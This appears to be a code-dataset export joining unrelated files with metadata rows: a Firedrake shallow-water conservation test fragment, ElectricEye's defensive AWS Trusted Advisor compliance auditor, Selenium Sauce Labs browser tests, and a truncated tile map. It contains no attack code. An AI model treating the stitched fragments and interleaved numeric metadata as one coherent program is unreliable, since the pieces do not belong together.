    # Mixed DG1 function space: water depth plus x/y momentum components.
    v_h = FunctionSpace(mesh, "DG", 1)
    v_mu = FunctionSpace(mesh, "DG", 1)
    v_mv = FunctionSpace(mesh, "DG", 1)
    V = v_h * v_mu * v_mv

    # Free surface: depth 1.0 inside a disc around the domain centre
    # (radius^2 < 0.05), 0.8 elsewhere; bed is flat (zero).
    g = Function(V)
    x = SpatialCoordinate(V.mesh())
    g.sub(0).interpolate(conditional(
        pow(x[0] - 0.5, 2) + pow(x[1] - 0.5, 2) < 0.05, 1.0, 0.8))
    bed = Function(V)
    state = State(V, g, bed)

    # No source term; snapshot the initial state before stepping.
    source = Function(v_h)
    w_start = Function(V).assign(state.w)

    # Advance the solution for a short interval.
    t_end = 0.01
    solution = Timestepper(V, state.bed, source, 0.025)
    w_end = solution.stepper(0, t_end, state.w, 0.025)

    # Project the depth component out of the mixed state at both times.
    h_start, mu_start, mv_start = split(w_start)
    h_end, mu_end, mv_end = split(w_end)
    depth_start = Function(v_h).project(h_start)
    depth_end = Function(v_h).project(h_end)

    # Total water volume before and after should agree to a tight tolerance.
    mass_diff = np.abs(assemble(depth_start * dx) - assemble(depth_end * dx))
    assert mass_diff <= 1e-4
if __name__ == "__main__":
    import os
    import pytest

    # Run this module's tests when executed directly.  pytest.main expects a
    # LIST of command-line arguments; passing a bare string path is rejected
    # by modern pytest versions.
    pytest.main([os.path.abspath(__file__)])
| 22.70297
| 77
| 0.633232
| 365
| 2,293
| 3.747945
| 0.224658
| 0.078947
| 0.083333
| 0.087719
| 0.804094
| 0.767544
| 0.767544
| 0.767544
| 0.767544
| 0.767544
| 0
| 0.033295
| 0.240297
| 2,293
| 100
| 78
| 22.93
| 0.752009
| 0.099869
| 0
| 0.740741
| 0
| 0
| 0.009775
| 0
| 0
| 0
| 0
| 0
| 0.037037
| 1
| 0.037037
| false
| 0
| 0.111111
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9c9dfda6eed7fb348a20dac1b4172b930711fc65
| 47,634
|
py
|
Python
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 442
|
2020-03-15T20:56:36.000Z
|
2022-03-31T22:13:07.000Z
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 57
|
2020-03-15T22:09:56.000Z
|
2022-03-31T13:17:06.000Z
|
eeauditor/auditors/aws/AWS_TrustedAdvisor_Auditor.py
|
kbhagi/ElectricEye
|
31960e1e1cfb75c5d354844ea9e07d5295442823
|
[
"Apache-2.0"
] | 59
|
2020-03-15T21:19:10.000Z
|
2022-03-31T15:01:31.000Z
|
#This file is part of ElectricEye.
#SPDX-License-Identifier: Apache-2.0
#Licensed to the Apache Software Foundation (ASF) under one
#or more contributor license agreements. See the NOTICE file
#distributed with this work for additional information
#regarding copyright ownership. The ASF licenses this file
#to you under the Apache License, Version 2.0 (the
#"License"); you may not use this file except in compliance
#with the License. You may obtain a copy of the License at
#http://www.apache.org/licenses/LICENSE-2.0
#Unless required by applicable law or agreed to in writing,
#software distributed under the License is distributed on an
#"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
#KIND, either express or implied. See the License for the
#specific language governing permissions and limitations
#under the License.
import boto3
import datetime
import botocore
from check_register import CheckRegister
# Check registry: functions decorated with @registry.register_check("support")
# below are collected for the ElectricEye runner.
registry = CheckRegister()
# boto3 client for the AWS Support API (backs all Trusted Advisor calls).
support = boto3.client("support")
# NOTE(review): the original "# loop through WAFs" comment here appeared to be
# copy-pasted from another auditor; this module audits Trusted Advisor checks.
def describe_trusted_advisor_checks(cache):
    """Return Trusted Advisor check metadata, memoized in *cache*.

    The DescribeTrustedAdvisorChecks API call is made at most once per run;
    its response is stored under a fixed key in the shared *cache* dict.
    """
    cached = cache.get("describe_trusted_advisor_checks")
    if cached:
        return cached
    cache["describe_trusted_advisor_checks"] = support.describe_trusted_advisor_checks(language='en')
    return cache["describe_trusted_advisor_checks"]
# RelatedRequirements shared by the passing and failing Root-MFA findings.
_ROOT_MFA_REQUIREMENTS = [
    "NIST CSF PR.AC-1",
    "NIST SP 800-53 AC-1",
    "NIST SP 800-53 AC-2",
    "NIST SP 800-53 IA-1",
    "NIST SP 800-53 IA-2",
    "NIST SP 800-53 IA-3",
    "NIST SP 800-53 IA-4",
    "NIST SP 800-53 IA-5",
    "NIST SP 800-53 IA-6",
    "NIST SP 800-53 IA-7",
    "NIST SP 800-53 IA-8",
    "NIST SP 800-53 IA-9",
    "NIST SP 800-53 IA-10",
    "NIST SP 800-53 IA-11",
    "AICPA TSC CC6.1",
    "AICPA TSC CC6.2",
    "ISO 27001:2013 A.9.2.1",
    "ISO 27001:2013 A.9.2.2",
    "ISO 27001:2013 A.9.2.3",
    "ISO 27001:2013 A.9.2.4",
    "ISO 27001:2013 A.9.2.6",
    "ISO 27001:2013 A.9.3.1",
    "ISO 27001:2013 A.9.4.2",
    "ISO 27001:2013 A.9.4.3",
]


def _root_mfa_finding(check_id, aws_account_id, aws_region, aws_partition, observed_at, failing):
    """Build the ASFF finding for the "MFA on Root Account" Trusted Advisor check.

    The passing and failing variants differ only in severity, description
    suffix, compliance status, workflow status and record state; everything
    else was duplicated verbatim in the original.
    """
    if failing:
        severity = "CRITICAL"
        status = "FAILED"
        workflow = "NEW"
        record_state = "ACTIVE"
        detail = ". has failed. Trusted Advisor checks the root account and warns if multi-factor authentication (MFA) is not enabled. For increased security, we recommend that you protect your account by using MFA, which requires a user to enter a unique authentication code from their MFA hardware or virtual device when interacting with the AWS console and associated websites. Refer to the remediation instructions if this configuration is not intended."
    else:
        severity = "INFORMATIONAL"
        status = "PASSED"
        workflow = "RESOLVED"
        record_state = "ARCHIVED"
        detail = ". is passing."
    return {
        "SchemaVersion": "2018-10-08",
        "Id": aws_account_id + check_id + "/trusted-advisor-failing-root-mfa-check",
        "ProductArn": f"arn:{aws_partition}:securityhub:{aws_region}:{aws_account_id}:product/{aws_account_id}/default",
        "GeneratorId": aws_account_id + check_id,
        "AwsAccountId": aws_account_id,
        "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
        "FirstObservedAt": observed_at,
        "CreatedAt": observed_at,
        "UpdatedAt": observed_at,
        "Severity": {"Label": severity},
        "Confidence": 99,
        "Title": "[TrustedAdvisor.1] Trusted Advisor check results for MFA on Root Account should be investigated",
        "Description": "Trusted Advisor Check for MFA on Root Account with a Check Id of " + check_id + detail,
        "Remediation": {
            "Recommendation": {
                "Text": "To learn more about setting up MFA refer to the Using multi-factor authentication (MFA) in AWS section of the AWS Identity and Access Management User Guide.",
                "Url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html"
            }
        },
        "ProductFields": {"Product Name": "ElectricEye"},
        "SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
        "Resources": [
            {
                "Type": "AwsTrustedAdvisorCheck",
                "Id": check_id,
                "Partition": aws_partition,
                "Region": aws_region
            }
        ],
        "Compliance": {
            "Status": status,
            # Copy so a consumer mutating one finding cannot affect others.
            "RelatedRequirements": list(_ROOT_MFA_REQUIREMENTS)
        },
        "Workflow": {"Status": workflow},
        "RecordState": record_state
    }


@registry.register_check("support")
def trusted_advisor_failing_root_mfa_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[TrustedAdvisor.1] Trusted Advisor check results for MFA on Root Account should be investigated"""
    # Timezone-aware UTC timestamp; datetime.utcnow() is deprecated and naive.
    iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
    if awsRegion != 'us-east-1':
        # The Support (Trusted Advisor) API is only served from us-east-1.
        print('AWS Health Global endpoint is located in us-east-1')
        return
    try:
        for check in describe_trusted_advisor_checks(cache=cache)["checks"]:
            if str(check["name"]) != "MFA on Root Account":
                continue
            checkId = str(check["id"])
            result = support.describe_trusted_advisor_check_result(checkId=checkId)
            # One or more flagged resources means the TA check is failing.
            failing = int(result["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1
            yield _root_mfa_finding(checkId, awsAccountId, awsRegion, awsPartition, iso8601Time, failing)
            break
    except botocore.exceptions.ClientError as error:
        # The Support API requires a Business/Enterprise support plan.
        if error.response['Error']['Code'] == 'SubscriptionRequiredException':
            print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
        else:
            print(error)
# RelatedRequirements shared by the passing and failing ELB-listener findings.
_ELB_LISTENER_REQUIREMENTS = [
    "NIST CSF PR.DS-2",
    "NIST SP 800-53 SC-8",
    "NIST SP 800-53 SC-11",
    "NIST SP 800-53 SC-12",
    "AICPA TSC CC6.1",
    "ISO 27001:2013 A.8.2.3",
    "ISO 27001:2013 A.13.1.1",
    "ISO 27001:2013 A.13.2.1",
    "ISO 27001:2013 A.13.2.3",
    "ISO 27001:2013 A.14.1.2",
    "ISO 27001:2013 A.14.1.3",
]


def _elb_listener_finding(check_id, aws_account_id, aws_region, aws_partition, observed_at, failing):
    """Build the ASFF finding for the "ELB Listener Security" Trusted Advisor check.

    Pass/fail variants differ only in severity, description suffix,
    compliance status, workflow status and record state.
    """
    if failing:
        severity = "MEDIUM"
        status = "FAILED"
        workflow = "NEW"
        record_state = "ACTIVE"
        detail = ". has failed. Trusted Advisor checks for load balancers with listeners that do not use recommended security configurations for encrypted communication. AWS recommends using a secure protocol (HTTPS or SSL), up-to-date security policies, and ciphers and protocols that are secure. Refer to the remediation instructions if this configuration is not intended."
    else:
        severity = "INFORMATIONAL"
        status = "PASSED"
        workflow = "RESOLVED"
        record_state = "ARCHIVED"
        detail = ". is passing."
    return {
        "SchemaVersion": "2018-10-08",
        "Id": aws_account_id + check_id + "/trusted-advisor-failing-elb-listener-security-check",
        "ProductArn": f"arn:{aws_partition}:securityhub:{aws_region}:{aws_account_id}:product/{aws_account_id}/default",
        "GeneratorId": aws_account_id + check_id,
        "AwsAccountId": aws_account_id,
        "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
        "FirstObservedAt": observed_at,
        "CreatedAt": observed_at,
        "UpdatedAt": observed_at,
        "Severity": {"Label": severity},
        "Confidence": 99,
        "Title": "[TrustedAdvisor.2] Trusted Advisor check results for ELB Listener Security should be investigated",
        "Description": "Trusted Advisor Check for ELB Listener Security with a Check Id of " + check_id + detail,
        "Remediation": {
            "Recommendation": {
                "Text": "To learn more about setting up TLS/SSL for ELBv1 refer to the Listeners for your Classic Load Balancer section of the Elastic Load Balancing Classic Load Balancers User Guide.",
                "Url": "https://docs.aws.amazon.com/elasticloadbalancing/latest/classic/elb-listener-config.html#elb-listener-protocols"
            }
        },
        "ProductFields": {"Product Name": "ElectricEye"},
        "SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
        "Resources": [
            {
                "Type": "AwsTrustedAdvisorCheck",
                "Id": check_id,
                "Partition": aws_partition,
                "Region": aws_region
            }
        ],
        "Compliance": {
            "Status": status,
            # Copy so a consumer mutating one finding cannot affect others.
            "RelatedRequirements": list(_ELB_LISTENER_REQUIREMENTS)
        },
        "Workflow": {"Status": workflow},
        "RecordState": record_state
    }


@registry.register_check("support")
def trusted_advisor_failing_elb_listener_security_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[TrustedAdvisor.2] Trusted Advisor check results for ELB Listener Security should be investigated"""
    # Timezone-aware UTC timestamp; datetime.utcnow() is deprecated and naive.
    iso8601Time = datetime.datetime.now(datetime.timezone.utc).isoformat()
    if awsRegion != 'us-east-1':
        # The Support (Trusted Advisor) API is only served from us-east-1.
        print('AWS Health Global endpoint is located in us-east-1')
        return
    try:
        for check in describe_trusted_advisor_checks(cache=cache)["checks"]:
            if str(check["name"]) != "ELB Listener Security":
                continue
            checkId = str(check["id"])
            result = support.describe_trusted_advisor_check_result(checkId=checkId)
            # One or more flagged resources means the TA check is failing.
            failing = int(result["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1
            yield _elb_listener_finding(checkId, awsAccountId, awsRegion, awsPartition, iso8601Time, failing)
            break
    except botocore.exceptions.ClientError as error:
        # The Support API requires a Business/Enterprise support plan.
        if error.response['Error']['Code'] == 'SubscriptionRequiredException':
            print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
        else:
            print(error)
@registry.register_check("support")
def trusted_advisor_failing_cloudfront_ssl_cert_iam_certificate_store_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[TrustedAdvisor.3] Trusted Advisor check results for CloudFront Custom SSL Certificates in the IAM Certificate Store should be investigated"""
    iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
    # Trusted Advisor is only served from the us-east-1 (global) endpoint
    if awsRegion == 'us-east-1':
        try:
            for check in describe_trusted_advisor_checks(cache=cache)["checks"]:
                # only the CloudFront/IAM certificate store check is covered by this auditor
                if str(check["name"]) != "CloudFront Custom SSL Certificates in the IAM Certificate Store":
                    continue
                checkId = str(check["id"])
                # one or more flagged resources means the Trusted Advisor check is failing
                checkIsFailing = int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1
                # one finding literal covers both outcomes; only the status-bearing
                # fields differ between the failing and passing cases
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-cert-iam-cert-store-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": awsAccountId + checkId,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "MEDIUM" if checkIsFailing else "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[TrustedAdvisor.3] Trusted Advisor check results for CloudFront Custom SSL Certificates in the IAM Certificate Store should be investigated",
                    "Description": "Trusted Advisor Check for CloudFront Custom SSL Certificates in the IAM Certificate Store with a Check Id of "
                    + checkId
                    + (
                        ". has failed. Trusted Advisor checks the SSL certificates for CloudFront alternate domain names in the IAM certificate store and alerts you if the certificate is expired, will soon expire, uses outdated encryption, or is not configured correctly for the distribution. When a custom certificate for an alternate domain name expires, browsers that display your CloudFront content might show a warning message about the security of your website. Refer to the remediation instructions if this configuration is not intended."
                        if checkIsFailing
                        else ". is passing."
                    ),
                    "Remediation": {
                        "Recommendation": {
                            "Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
                            "Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
                    "Resources": [
                        {
                            "Type": "AwsTrustedAdvisorCheck",
                            "Id": checkId,
                            "Partition": awsPartition,
                            "Region": awsRegion
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED" if checkIsFailing else "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-2",
                            "NIST SP 800-53 SC-8",
                            "NIST SP 800-53 SC-11",
                            "NIST SP 800-53 SC-12",
                            "AICPA TSC CC6.1",
                            "ISO 27001:2013 A.8.2.3",
                            "ISO 27001:2013 A.13.1.1",
                            "ISO 27001:2013 A.13.2.1",
                            "ISO 27001:2013 A.13.2.3",
                            "ISO 27001:2013 A.14.1.2",
                            "ISO 27001:2013 A.14.1.3"
                        ]
                    },
                    "Workflow": {"Status": "NEW" if checkIsFailing else "RESOLVED"},
                    "RecordState": "ACTIVE" if checkIsFailing else "ARCHIVED"
                }
                yield finding
                break
        except botocore.exceptions.ClientError as error:
            if error.response['Error']['Code'] == 'SubscriptionRequiredException':
                print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
            else:
                print(error)
    else:
        print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_cloudfront_ssl_cert_on_origin_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[TrustedAdvisor.4] Trusted Advisor check results for CloudFront SSL Certificate on the Origin Server should be investigated"""
    iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
    # Trusted Advisor is only served from the us-east-1 (global) endpoint
    if awsRegion == 'us-east-1':
        try:
            for check in describe_trusted_advisor_checks(cache=cache)["checks"]:
                # only the CloudFront origin-certificate check is covered by this auditor
                if str(check["name"]) != "CloudFront SSL Certificate on the Origin Server":
                    continue
                checkId = str(check["id"])
                # one or more flagged resources means the Trusted Advisor check is failing
                checkIsFailing = int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1
                # one finding literal covers both outcomes; only the status-bearing
                # fields differ between the failing and passing cases
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": awsAccountId + checkId + "/trusted-advisor-failing-cloudfront-ssl-origin-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": awsAccountId + checkId,
                    "AwsAccountId": awsAccountId,
                    "Types": ["Software and Configuration Checks/AWS Security Best Practices"],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "MEDIUM" if checkIsFailing else "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[TrustedAdvisor.4] Trusted Advisor check results for CloudFront SSL Certificate on the Origin Server should be investigated",
                    "Description": "Trusted Advisor Check for CloudFront SSL Certificate on the Origin Server with a Check Id of "
                    + checkId
                    + (
                        ". has failed. Trusted Advisor checks your origin server for SSL certificates that are expired, about to expire, missing, or that use outdated encryption. If a certificate is expired, CloudFront responds to requests for your content with HTTP status code 502, Bad Gateway. Certificates that were encrypted by using the SHA-1 hashing algorithm are being deprecated by web browsers such as Chrome and Firefox. Refer to the remediation instructions if this configuration is not intended."
                        if checkIsFailing
                        else ". is passing."
                    ),
                    "Remediation": {
                        "Recommendation": {
                            "Text": "To learn more about setting up HTTPS for CloudFront refer to the Using HTTPS with CloudFront section of the Amazon CloudFront Developer Guide.",
                            "Url": "https://docs.aws.amazon.com/AmazonCloudFront/latest/DeveloperGuide/using-https.html"
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
                    "Resources": [
                        {
                            "Type": "AwsTrustedAdvisorCheck",
                            "Id": checkId,
                            "Partition": awsPartition,
                            "Region": awsRegion
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED" if checkIsFailing else "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF PR.DS-2",
                            "NIST SP 800-53 SC-8",
                            "NIST SP 800-53 SC-11",
                            "NIST SP 800-53 SC-12",
                            "AICPA TSC CC6.1",
                            "ISO 27001:2013 A.8.2.3",
                            "ISO 27001:2013 A.13.1.1",
                            "ISO 27001:2013 A.13.2.1",
                            "ISO 27001:2013 A.13.2.3",
                            "ISO 27001:2013 A.14.1.2",
                            "ISO 27001:2013 A.14.1.3"
                        ]
                    },
                    "Workflow": {"Status": "NEW" if checkIsFailing else "RESOLVED"},
                    "RecordState": "ACTIVE" if checkIsFailing else "ARCHIVED"
                }
                yield finding
                break
        except botocore.exceptions.ClientError as error:
            if error.response['Error']['Code'] == 'SubscriptionRequiredException':
                print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
            else:
                print(error)
    else:
        print('AWS Health Global endpoint is located in us-east-1')
@registry.register_check("support")
def trusted_advisor_failing_exposed_access_keys_check(cache: dict, awsAccountId: str, awsRegion: str, awsPartition: str) -> dict:
    """[TrustedAdvisor.5] Trusted Advisor check results for Exposed Access Keys should be investigated"""
    iso8601Time = datetime.datetime.utcnow().replace(tzinfo=datetime.timezone.utc).isoformat()
    # Trusted Advisor is only served from the us-east-1 (global) endpoint
    if awsRegion == 'us-east-1':
        try:
            for check in describe_trusted_advisor_checks(cache=cache)["checks"]:
                # only the Exposed Access Keys check is covered by this auditor
                if str(check["name"]) != "Exposed Access Keys":
                    continue
                checkId = str(check["id"])
                # one or more flagged resources means the Trusted Advisor check is failing
                checkIsFailing = int(support.describe_trusted_advisor_check_result(checkId=checkId)["result"]["resourcesSummary"]["resourcesFlagged"]) >= 1
                # FIX: the passing branch previously reused the failing text ("has failed...");
                # it now reports ". is passing." like every other check in this auditor.
                # FIX: the remediation URL previously pointed at the CloudFront HTTPS guide;
                # it now matches the recommendation text (IAM access-key management docs).
                finding = {
                    "SchemaVersion": "2018-10-08",
                    "Id": awsAccountId + checkId + "/trusted-advisor-expose-iam-keys-check",
                    "ProductArn": f"arn:{awsPartition}:securityhub:{awsRegion}:{awsAccountId}:product/{awsAccountId}/default",
                    "GeneratorId": awsAccountId + checkId,
                    "AwsAccountId": awsAccountId,
                    "Types": [
                        "Software and Configuration Checks/AWS Security Best Practices",
                        "Effects/Data Exposure",
                    ],
                    "FirstObservedAt": iso8601Time,
                    "CreatedAt": iso8601Time,
                    "UpdatedAt": iso8601Time,
                    "Severity": {"Label": "CRITICAL" if checkIsFailing else "INFORMATIONAL"},
                    "Confidence": 99,
                    "Title": "[TrustedAdvisor.5] Trusted Advisor check results for Exposed Access Keys should be investigated",
                    "Description": "Trusted Advisor Check for Exposed Access Keys with a Check Id of "
                    + checkId
                    + (
                        ". has failed. Trusted Advisor checks popular code repositories for access keys that have been exposed to the public and for irregular Amazon Elastic Compute Cloud (Amazon EC2) usage that could be the result of a compromised access key. An access key consists of an access key ID and the corresponding secret access key. Exposed access keys pose a security risk to your account and other users. Refer to the remediation instructions if this configuration is not intended."
                        if checkIsFailing
                        else ". is passing."
                    ),
                    "Remediation": {
                        "Recommendation": {
                            "Text": "To learn more about rotating access keys refer to the Managing access keys for IAM users section of the AWS Identity and Access Management User Guide.",
                            "Url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_access-keys.html"
                        }
                    },
                    "ProductFields": {"Product Name": "ElectricEye"},
                    "SourceUrl": "https://console.aws.amazon.com/trustedadvisor/home?region=us-east-1#/category/security",
                    "Resources": [
                        {
                            "Type": "AwsTrustedAdvisorCheck",
                            "Id": checkId,
                            "Partition": awsPartition,
                            "Region": awsRegion
                        }
                    ],
                    "Compliance": {
                        "Status": "FAILED" if checkIsFailing else "PASSED",
                        "RelatedRequirements": [
                            "NIST CSF PR.AC-1",
                            "NIST SP 800-53 AC-1",
                            "NIST SP 800-53 AC-2",
                            "NIST SP 800-53 IA-1",
                            "NIST SP 800-53 IA-2",
                            "NIST SP 800-53 IA-3",
                            "NIST SP 800-53 IA-4",
                            "NIST SP 800-53 IA-5",
                            "NIST SP 800-53 IA-6",
                            "NIST SP 800-53 IA-7",
                            "NIST SP 800-53 IA-8",
                            "NIST SP 800-53 IA-9",
                            "NIST SP 800-53 IA-10",
                            "NIST SP 800-53 IA-11",
                            "AICPA TSC CC6.1",
                            "AICPA TSC CC6.2",
                            "ISO 27001:2013 A.9.2.1",
                            "ISO 27001:2013 A.9.2.2",
                            "ISO 27001:2013 A.9.2.3",
                            "ISO 27001:2013 A.9.2.4",
                            "ISO 27001:2013 A.9.2.6",
                            "ISO 27001:2013 A.9.3.1",
                            "ISO 27001:2013 A.9.4.2",
                            "ISO 27001:2013 A.9.4.3"
                        ]
                    },
                    "Workflow": {"Status": "NEW" if checkIsFailing else "RESOLVED"},
                    "RecordState": "ACTIVE" if checkIsFailing else "ARCHIVED"
                }
                yield finding
                break
        except botocore.exceptions.ClientError as error:
            if error.response['Error']['Code'] == 'SubscriptionRequiredException':
                print('You are not subscribed to AWS Premium Support - cannot use the Trusted Advisor Auditor')
            else:
                print(error)
    else:
        print('AWS Health Global endpoint is located in us-east-1')
| 64.896458
| 552
| 0.437419
| 3,988
| 47,634
| 5.201103
| 0.097041
| 0.020249
| 0.030373
| 0.037123
| 0.898178
| 0.892248
| 0.89191
| 0.889355
| 0.886848
| 0.884678
| 0
| 0.064954
| 0.476089
| 47,634
| 734
| 553
| 64.896458
| 0.766188
| 0.034387
| 0
| 0.86087
| 0
| 0.052174
| 0.396221
| 0.039831
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008696
| false
| 0.013043
| 0.005797
| 0
| 0.017391
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9cd732bbb3bab6571256b7e251bd9ac5290034ff
| 1,620
|
py
|
Python
|
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | 1
|
2021-11-17T22:29:42.000Z
|
2021-11-17T22:29:42.000Z
|
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | null | null | null |
python/se4-w3c/tests/test_yosemite.py
|
saucelabs-training/platform-config-tests
|
11dfab8f9be2fe118ed0b0fa4adebb75a5f1a64c
|
[
"MIT"
] | 1
|
2021-11-17T22:29:35.000Z
|
2021-11-17T22:29:35.000Z
|
def test_late_chrome(helpers):
    """Request Chrome 87 on 'OS X 10.10' (empty sauce:options) and validate via the shared helpers."""
    from selenium.webdriver.chrome.options import Options as ChromeOptions
    options = ChromeOptions()
    # same capabilities as before, applied in the same order
    for capability, value in (
        ('browserVersion', '87'),
        ('platformName', 'OS X 10.10'),
        ('sauce:options', {}),
    ):
        options.set_capability(capability, value)
    helpers.validate_google(helpers.start_driver(options))
def test_early_chrome(helpers):
    """Request Chrome 75 on 'OS X 10.10' (empty sauce:options) and validate via the shared helpers."""
    from selenium.webdriver.chrome.options import Options as ChromeOptions
    options = ChromeOptions()
    # same capabilities as before, applied in the same order
    for capability, value in (
        ('browserVersion', '75'),
        ('platformName', 'OS X 10.10'),
        ('sauce:options', {}),
    ):
        options.set_capability(capability, value)
    helpers.validate_google(helpers.start_driver(options))
def test_late_edge(helpers):
    """Request Edge 81 on 'OS X 10.10' (empty sauce:options) and validate via the shared helpers."""
    from selenium.webdriver.edge.options import Options as EdgeOptions
    options = EdgeOptions()
    # same capabilities as before, applied in the same order
    for capability, value in (
        ('browserVersion', '81'),
        ('platformName', 'OS X 10.10'),
        ('sauce:options', {}),
    ):
        options.set_capability(capability, value)
    helpers.validate_google(helpers.start_driver(options))
def test_early_edge(helpers):
    """Request Edge 79 on 'OS X 10.10' (empty sauce:options) and validate via the shared helpers."""
    from selenium.webdriver.edge.options import Options as EdgeOptions
    options = EdgeOptions()
    # same capabilities as before, applied in the same order
    for capability, value in (
        ('browserVersion', '79'),
        ('platformName', 'OS X 10.10'),
        ('sauce:options', {}),
    ):
        options.set_capability(capability, value)
    helpers.validate_google(helpers.start_driver(options))
| 31.764706
| 74
| 0.741975
| 188
| 1,620
| 6.202128
| 0.164894
| 0.102916
| 0.205832
| 0.096055
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0.980274
| 0
| 0.017467
| 0.151852
| 1,620
| 50
| 75
| 32.4
| 0.83115
| 0
| 0
| 0.777778
| 0
| 0
| 0.125926
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| false
| 0
| 0.111111
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
9cfc5b2a78c4951499a131ccc48f1bb85b42ae94
| 21,885
|
py
|
Python
|
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
newtiles.py
|
Owen6/Adventure
|
0f1365ccb2d307f812b547ab4278703d00f6ffdf
|
[
"MIT"
] | null | null | null |
# 24x40 tile grid (the old maps were 18x32). Tile codes appear to be
# 1 = wall / solid and 0 = open floor — TODO confirm against the renderer.
# Layout: four corner rooms joined by corridors around a central chamber,
# with doorways at top, bottom, left and right edges.
castle = [[1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],
[1,1,1,1,1,1,1,1,1,1,1,0,1,0,1,0,1,0,0,0,0,0,0,1,0,1,0,1,0,1,1,1,1,1,1,1,1,1,1,1],
